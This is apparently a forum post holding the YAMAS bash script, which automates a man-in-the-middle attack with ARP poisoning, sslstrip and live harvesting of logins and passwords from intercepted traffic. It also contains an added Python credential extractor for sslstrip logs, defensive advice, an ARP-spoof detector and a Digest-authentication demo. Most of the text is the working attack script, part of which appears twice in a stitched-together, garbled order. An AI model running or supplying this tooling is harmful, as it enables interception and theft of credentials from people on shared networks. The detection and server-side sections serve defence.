echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){" > /tmp/looparse.sh
if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
else
echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
fi
echo "while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
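As an added example (not YAMAS code), the same credential extraction the awk pipeline in looparse.sh does, in Python, with URL-decoding so that %40 and + come out as @ and a space instead of having to be read off the ASCII table. The log shape assumed ("... POST Data (host):" on one line, the urlencoded body on the next) is the one the awk pattern relies on; the log text, hosts and credentials are constructed, and the list of credential-looking field names stands in for the grepcred.txt file the script downloads.

```python
#!/usr/bin/env python3
"""Pull credentials out of an sslstrip log (added example, not YAMAS code).

Assumed log shape, as the script's awk relies on it: a line ending in
"POST Data (<host>):" followed by the urlencoded request body on the next line.
"""
import re
from urllib.parse import parse_qsl

POST_LINE = re.compile(r"POST Data \(([^)]+)\):")

# Stand-in for the downloaded grepcred.txt pattern list: field names that usually
# carry a login or a password (assumed list, extend as needed).
CRED_KEY = re.compile(r"user|login|e?mail|name|pass|pwd", re.I)

MIN_LEN = 4  # same noise filter as the awk pipeline: values shorter than 4 chars are dropped

# Constructed log (made-up hosts, accounts and timestamps).
SAMPLE_LOG = """\
2011-05-02 12:00:00,123 SECURE POST Data (www.example.com):
username=alice%40example.com&password=S3cret+Pa%24%24&remember=1

2011-05-02 12:00:05,456 POST Data (forum.example.net):
q=hello+world

2011-05-02 12:00:07,789 SECURE POST Data (mail.example.org):
login=robert&pwd=hunter2&submit=Log+in
"""


def parse_sslstrip_log(text):
    """Return [(host, {field: decoded value})] for every POST carrying credentials."""
    found = []
    lines = text.splitlines()
    for i, line in enumerate(lines[:-1]):
        m = POST_LINE.search(line)
        if not m:
            continue
        host = m.group(1)
        # parse_qsl undoes the urlencoding ('+' -> ' ', '%40' -> '@') that the
        # script's real-time window leaves for you to decode by hand
        fields = dict(parse_qsl(lines[i + 1], keep_blank_values=True))
        hits = {k: v for k, v in fields.items()
                if CRED_KEY.search(k) and len(v) >= MIN_LEN}
        if hits:
            found.append((host, hits))
    return found


if __name__ == "__main__":
    import sys
    # usage: python3 sslparse.py /tmp/yamas.txt   (no argument: the constructed sample)
    text = open(sys.argv[1], errors="replace").read() if sys.argv[1:] else SAMPLE_LOG
    for host, creds in parse_sslstrip_log(text):
        print(host)
        for k, v in creds.items():
            print(f"    {k} = {v}")
```

The second POST (a search box) shows why the field-name filter exists: without it every form on the network ends up in the "passwords" window. It also shows the limit of the approach: a site that names its fields anything else slips through, which is exactly why the script downloads grepcred.txt separately so the list can be updated without touching the script.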
\ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
\ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
| | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
\_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
kill ${sslstripid}
kill ${looparseid}
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
killall ettercap
else
killall arpspoof
fi
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
rm /tmp/grepcred.txt
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt /root/$filename.txt #moving file
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not downloading needed 'grepcred.txt' file because of silent mode. Make sure you already have a copy or the parsing *will* fail."
else
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
fi
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
if [[ $install = "Y" || $install = "y" ]] ; then # "$install="y"" was a non-empty string, so the test was always true
cp ./yamas.sh /usr/bin/yamas #copy and rename script
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit 1
}
updatestrip() {
wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install > /dev/null
cd ..
rm sslstrip-0.9.tar.gz
}
search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target() {
echo "Enter a new IP address to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii() {
clear
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "ASCII tables won't be available"
echo "ASCII tables are not available" > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii
rm /tmp/ascii
fi
final
}
tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
final
}
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
rtparse
fi
}
final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.
Enter the number of the desired option."
read final
if [ "$final" = "1" ] ; then
rescan
elif [ "$final" = "2" ] ; then
add_target
elif [ "$final" = "3" ] ; then
ascii
elif [ "$final" = "4" ] ; then
tailsecure
elif [ "$final" = "5" ] ; then
rtparse
elif [ "$final" = "6" ] ; then
cleanup
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final
fi
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ] ; then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ] ; then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
else
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
read -e sslupdate
if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
else echo -e "\033[33mOops, install failed.\033[m Continuing with current version."
fi
else echo "All right, continuing with current version."
fi
elif [[ $sslversion = "0.9" ]]; then
echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
fi
elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
read -e sslupdate
if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo -e "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
else echo "All right, continuing with current, non-installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
fi
elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
chmod +x '/pentest/web/sslstrip/sslstrip.py'
if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Now it is. Continuing..."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
installed.
You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
read apti
if [[ $apti = "Y" || $apti = "y" ]] ; then
apt-get install sslstrip
exit 1
fi
fi
fi
fi
sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3," ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 2) { print $5}')
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway address or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$(ip route show | awk '(NR == 2) { print $5}') #store default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo
echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi() { # We launch Ettercap in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
}
read -e parameters
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
ettercapi $parameters
else
arpspoofi $parameters
fi
else
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp // // &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
else
xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
sleep 2
echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
fi
fi
echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){" > /tmp/looparse.sh
if [[ "$1" = "-s" || "$2" = "-s" ]]; then sleep 0.5
else
echo "wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt" >> /tmp/looparse.sh
fi
echo "while :
do
clear
echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
}
looparse" >> /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
Well, this script is a MITM attack. But how do you protect yourself from this kind of crap?!
How to protect yourself from Man in the Middle Attacks ? --
Introduction -- How it works.
In the attack Yamas uses, the vector is the poisoning of the victim's ARP cache. ARP is the protocol that "translates" between IP addresses and physical MAC addresses on the local network. When a device connects to the network, it asks for the MAC of the router's IP, e.g. "Who has 192.168.1.1? Tell 192.168.1.2". The router then responds "192.168.1.1 [router] is at 11:22:33:44:55:66 [router]". This is written into the client's ARP cache. And this is where we come into play. We send spoofed ARP responses: "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]". The client then modifies its cache to set the attacker as the router. We then forward the traffic to the real router, which allows us to read and manipulate the traffic on the fly. That's how we get the passwords. Thanks to sslstrip, we force the clients to send the credentials as clear text, so that we can simply read them.
All right, but now, how do you keep that from happening to you?
Protection - Client side
When you are a client - a website visitor - there are two things you can do: use programs, and/or your head. Program-wise, you'll have to find one that regularly checks for changes in the ARP table and warns you of suspicious ones. Well-known ones include ARPon and ARPwatch.
You could also use ettercap under *nix or Wireshark on any platform: even though it is not their job, and they will not run all the time, they will warn you of duplicate ARP responses with different MAC addresses. The same can be achieved with some internet security suites, but I won't give them free advertising, so you'll have to find them with your friend Google.
In the end, it's mostly a question of habits, of using your head and knowing your environment: thou shalt never, ever enter any [important] credential over an unsecured connection such as a public hotspot or open wifi, under any circumstances. Thou shalt always check that the connection to the website is safe: the certificate looks good, is up to date, and the connection is tunneled through SSL (v3 if possible).
Since you're here, you probably use this attack yourself, so you should be able to recognize the glitches it causes: have to reload the page? Page looks weird? Takes time to load? Disconnected when you didn't ask for it? Pay attention, you may be under attack!
If you have any doubt, just don't send anything sensitive over the network. It may seem obvious, but that's how you'll really protect yourself.
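What such an ARP-watching program actually does, for the "Who has / is at" exchange described in the introduction and the duplicate-reply warning mentioned just above, as an added example (not part of YAMAS, ArpON, arpwatch or Wireshark): it parses ARP replies, keeps the IP-to-MAC bindings it has seen, and alerts when an IP suddenly answers from a different MAC. The sample lines are constructed in the shape of `tcpdump -n arp` output (not a real capture), and the MAC addresses are the ones from the post's own example; `static` is an assumed option for bindings you trust, such as your gateway.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape of `tcpdump -n arp` output (not a real capture);
# the 00:11:22:66:66:66 reply for the router's IP plays the spoofed answer from the post.
SAMPLE_LINES = """\
12:00:00.000100 ARP, Request who-has 192.168.1.1 tell 192.168.1.2, length 28
12:00:00.000200 ARP, Reply 192.168.1.1 is-at 11:22:33:44:55:66, length 28
12:00:01.000000 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:01, length 28
12:00:02.000000 ARP, Reply 192.168.1.1 is-at 11:22:33:44:55:66, length 28
12:00:03.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:66:66:66, length 28
12:00:03.500000 ARP, Reply 192.168.1.1 is-at 11:22:33:44:55:66, length 28
12:00:04.000000 ARP, Reply 192.168.1.20 is-at aa:bb:cc:dd:ee:01, length 28
"""

_REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
)


def parse_reply(line):
    """Return (timestamp, ip, mac) for an ARP reply line; None for requests and other lines."""
    m = _REPLY_RE.match(line)
    if not m:
        return None
    return m.group("ts"), m.group("ip"), m.group("mac").lower()


class ArpWatcher:
    """Tracks the IP->MAC bindings seen in replies and alerts when a binding changes.

    `static` holds bindings you trust (e.g. the gateway): a reply contradicting one is
    reported but never overwrites it. Dynamic entries follow the change, so a real/forged
    flip-flop for the same IP shows up as repeated alerts.
    """

    def __init__(self, static=None):
        self.static = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.table = dict(self.static)
        self.alerts = []

    def observe(self, ts, ip, mac):
        prev = self.table.get(ip)
        if prev is None:          # first time we see this IP: learn it
            self.table[ip] = mac
            return None
        if prev == mac:           # same binding as before: nothing to report
            return None
        alert = {
            "ts": ts, "ip": ip, "old_mac": prev, "new_mac": mac,
            "kind": "trusted binding contradicted" if ip in self.static else "binding changed",
        }
        self.alerts.append(alert)
        if ip not in self.static:
            self.table[ip] = mac  # follow the change for dynamic entries
        return alert


def watch(lines, static=None):
    """Feed ARP lines through the watcher and return the list of alerts."""
    w = ArpWatcher(static)
    for line in lines:
        parsed = parse_reply(line)
        if parsed:
            w.observe(*parsed)
    return w.alerts


def flapping_ips(alerts, min_alerts=2):
    """IPs whose binding changed at least `min_alerts` times: the gateway alternating
    between the real router's MAC and another one is the classic poisoning signature."""
    counts = defaultdict(int)
    for a in alerts:
        counts[a["ip"]] += 1
    return sorted(ip for ip, n in counts.items() if n >= min_alerts)


if __name__ == "__main__":
    alerts = watch(SAMPLE_LINES.splitlines())
    for a in alerts:
        print(f"{a['ts']} {a['kind']}: {a['ip']} {a['old_mac']} -> {a['new_mac']}")
    print("flapping:", flapping_ips(alerts))
```

On the sample input the watcher raises two alerts for 192.168.1.1 (the forged reply, then the real router answering again), which is exactly the "duplicate ARP responses with different MAC addresses" pattern; pinning the gateway with `static` turns the forged reply into a single "trusted binding contradicted" alert and keeps the table unchanged. A real deployment would read the lines from a live capture instead of the constructed string.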
Protection - Server side
I either don't know much about it, or there's not much that I know to do. Well, here's what you can do: use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...) or request the passwords to be encrypted before they are sent! This can be done with .htaccess by using AuthType Digest. By requesting an MD5 encrypted password before it transits on the network, it could be sniffed, but rendered useless since MD5 isn't that easy to crack if you're using a good password. I know I wouldn't waste time cracking an MD5 password...
I'll try to add a module here to show you that. Meanwhile you can head over to maemo's website, which uses this technique, and sniff the network while doing so.
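What AuthType Digest puts on the wire instead of the password, as an added example that is not from the post, from Apache or from any site mentioned here: the client computes the RFC 2617 `response` hash (MD5, qop=auth) from the password and the server's challenge, and the server checks it against the stored HA1 without ever seeing the password. The realm, nonce, username and password are constructed values, and `USER_DB`/`lookup` stand in for the htdigest file Apache would consult.

```python
import hashlib
import hmac
import re

# Constructed values for the demonstration (not from the post): the challenge the server
# sends in WWW-Authenticate, and the credentials the user types into the browser prompt.
REALM = "members"
NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"   # server-chosen, fresh per challenge
USERNAME = "alice"
PASSWORD = "correct horse battery staple"
METHOD, URI = "POST", "/login"


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def htdigest_ha1(username, realm, password):
    """What the server stores (the third field of an htdigest line): MD5(user:realm:pass)."""
    return _md5(f"{username}:{realm}:{password}")


def digest_response(ha1, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 'response' with qop=auth: MD5(HA1:nonce:nc:cnonce:qop:HA2), HA2 = MD5(method:uri)."""
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def client_authorization(username, password, realm, method, uri, nonce,
                         nc="00000001", cnonce="0a4f113b"):
    """Build the Authorization header the browser sends; only hashes leave the client."""
    ha1 = htdigest_ha1(username, realm, password)
    resp = digest_response(ha1, method, uri, nonce, nc, cnonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", uri="{uri}", '
            f'qop=auth, nc={nc}, cnonce="{cnonce}", response="{resp}"')


_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]*))')


def parse_authorization(header):
    """Split 'Digest k="v", k=v, ...' into a dict (quoted and unquoted values alike)."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest header")
    return {k: (q if q else u) for k, q, u in _FIELD_RE.findall(header[len("Digest "):])}


def server_verify(header, method, ha1_lookup, expected_nonce):
    """Server side: recompute the response from the stored HA1 and compare in constant time.
    Rejects a header whose nonce is not the one this server issued (basic replay defence)."""
    f = parse_authorization(header)
    if f.get("nonce") != expected_nonce or f.get("qop") != "auth":
        return False
    ha1 = ha1_lookup(f["username"], f["realm"])
    if ha1 is None:
        return False
    expected = digest_response(ha1, method, f["uri"], f["nonce"], f["nc"], f["cnonce"], f["qop"])
    return hmac.compare_digest(expected, f["response"])


# Constructed server-side store, keyed the way an htdigest file is: (user, realm) -> HA1.
USER_DB = {(USERNAME, REALM): htdigest_ha1(USERNAME, REALM, PASSWORD)}


def lookup(username, realm):
    return USER_DB.get((username, realm))


def demo():
    """Returns (header, verified_by_server, password_visible_on_wire)."""
    header = client_authorization(USERNAME, PASSWORD, REALM, METHOD, URI, NONCE)
    return header, server_verify(header, METHOD, lookup, NONCE), PASSWORD in header


if __name__ == "__main__":
    h, ok, leaked = demo()
    print(h)
    print("verified:", ok, "| password visible on the wire:", leaked)
```

The header a sniffer sees carries only `response`, which is bound to the nonce, the method and the URI, so it is useless for logging in later from another machine; what an attacker can still do is run an offline dictionary attack against that hash, which is why the author's "good password" condition matters. Digest also does nothing for the rest of the session, so it complements rather than replaces TLS.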
Edit : This is not the latest available version, go and grab it at http://comax.fr/